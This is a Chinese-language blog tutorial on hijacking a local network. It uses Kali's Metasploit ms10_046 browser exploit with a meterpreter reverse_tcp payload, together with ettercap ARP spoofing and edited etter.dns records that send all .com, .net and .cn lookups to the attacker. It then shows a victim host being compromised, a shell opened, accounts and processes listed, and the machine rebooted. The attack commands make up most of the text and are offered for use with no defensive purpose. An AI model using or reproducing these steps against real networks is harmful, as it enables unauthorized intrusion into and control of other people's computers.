linux内网劫持教程,利用kali进行dns劫持入侵局域网

物理主机:kali2.0 192.168.1.50

目标主机:整个局域网

24e7a9019f6d81693f51b33944599426.png

运行msfconsole

依次输入:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //加载10_046浏览器漏洞模块

setg SRVHOST 192.168.1.50 //设置全局服务主机IP

set PAYLOAD windows/meterpreter/reverse_tcp //加载PAYLOAD攻击模块

setg LHOST 192.168.1.50 //设置攻击模块全局主机IP

exploit //攻击

这么配置只要局域网内有哪一台主机访问到http://192.168.1.50:80/这个链接就会中马。

然后修改ettercap DNS文件。

文件目录:/etc/ettercap/etter.dns

用记事本打开它。

ctrl+f 搜索

关键字:# redirect it to http://www.linux.org

这样修改一下,如图。

2271cebdb58babf5e38900212051ae74.png

# redirect it to http://www.linux.org

在下方依次添加

* A 192.168.1.50

* PTR 192.168.1.50

* .net 192.168.1.50

* .cn 192.168.1.50

* .com 192.168.1.50

然后保存即可。

4792def6e62b14b9092be49bee0c33a7.png

打开终端,运行ettercap输入如下命令:

ettercap -T -q -i eth0 -P dns_spoof -M arp

-M MAC监听

-T 脱机监听

-P 过滤筛选器

-i 使用此网络接口

eth0 本机网卡

ARP拦截局域网所有的DNS映射到本机的etter.dns中

64c249b58cb0589b2ab24e4b74d3aa25.png

列表滚动,局域网内已经有机器在打开网页。

df884d9dbe420f6defe6d04c7858fa19.png

局域网主机只要一打开网页,DNS都会映射到本机的IP上,淫荡的中马。

b425d13d93d1591fc81b0043c940efb9.png

sessions 查看,得到一台主机 192.168.1.12

dc6cbd47e54728eea3b04ab618ccad02.png

sessions -i 1 进入劫持会话

e6d1e531ff66030b93c00e54a353a91a.png

3603883d86a7531c0e869c84915d0977.png

shell -在受害者计算机上打开一个shell

net user // 查看计算机账户

netstat -ano //查看连接与开放的端口

这里可以看到192.168.1.12:1074与192.168.1.50:4444端口正在连接。

7aab0df2b17e2da860a3baff47085cfd.png

ps -列出正在运行的进程

getpid -获取当前进程 ID (PID)

3068

d120e25cc733de0765c51351ba0d44b8.png

reboot重启对方计算机,输入后已经与192.168.1.12断开连接。

  • 4
    点赞
  • 66
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值